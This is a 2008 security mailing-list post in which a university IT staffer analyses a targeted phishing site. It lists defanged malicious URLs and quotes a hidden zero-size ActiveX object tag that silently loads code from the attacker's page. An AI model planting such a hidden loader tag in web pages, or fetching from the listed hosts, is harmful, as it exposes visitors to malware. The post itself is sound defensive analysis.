[unisog] very specific IT-department phish
Michael Holstein
michael.holstein at csuohio.edu
Wed Jun 11 17:17:33 GMT 2008
> It probably is a legit Active X control, but one with a serious security hole
> that can be exploited. Active X is very dangerous as any Active X control
> can be used by any web page.
>
I don't think so .. further analysis :
hxxp://www.revenue-system.com/Body.php calls an iFrame that loads
hxxp://www.revenue-system/Acrobat.php
<object classid="clsid:BD942DA7-96C8-4342-84C6-E2BCFE69FE11" height="0"
width="0" codebase="Acrobat.php"></object>
This file is already on Virustotal :
http://www.virustotal.com/analisis/13bfb6913f9c328c7b657fce4ba4c731
A Google search of that CLSID shows it affiliated with a bunch of other
phishing/malware attempts.
Cheers,
Michael Holstein
Cleveland State University